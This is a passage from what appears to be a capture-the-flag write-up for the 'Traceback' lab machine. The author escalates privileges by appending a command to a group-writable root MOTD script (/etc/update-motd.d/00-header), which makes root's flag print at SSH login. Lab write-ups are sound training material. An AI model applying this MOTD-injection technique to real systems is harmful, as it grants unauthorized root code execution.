-rwxr-xr-x 1 root root  604 Aug 25  2019 80-esm
-rwxr-xr-x 1 root root 4.2K Aug 25  2019 50-motd-news
-rwxr-xr-x 1 root root  981 Aug 25  2019 00-header
-rwxr-xr-x 1 root root  982 Aug 27  2019 10-help-text
sysadmin@traceback:/var/backups/.update-motd.d$ echo "cat /root/root.txt" >> 00-header 
bash: 00-header: Permission denied

All these files are owned by root so I have no way of manipulating them

Checking the other directory /etc/update-motd.d/

sysadmin@traceback:/var/backups/.update-motd.d$ cd /etc/update-motd.d
sysadmin@traceback:/etc/update-motd.d$ ls -ltrh
total 24K
-rwxrwxr-x 1 root sysadmin  299 Apr 19 11:26 91-release-upgrade
-rwxrwxr-x 1 root sysadmin  604 Apr 19 11:26 80-esm
-rwxrwxr-x 1 root sysadmin 4.2K Apr 19 11:26 50-motd-news
-rwxrwxr-x 1 root sysadmin  982 Apr 19 11:26 10-help-text
-rwxrwxr-x 1 root sysadmin  981 Apr 19 11:26 00-header

Ah-ha, any of these files can be manipulated by sysadmin

sysadmin@traceback:/etc/update-motd.d$ cat 00-header 
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"
sysadmin@traceback:/etc/update-motd.d$ echo "cat /root/root.txt" >> 00-header

Now all I had to do was ssh into the box again...

kali@kali:~$ ssh webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

<flag>


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Apr 19 11:22:58 2020 from 10.10.15.1
.
.
.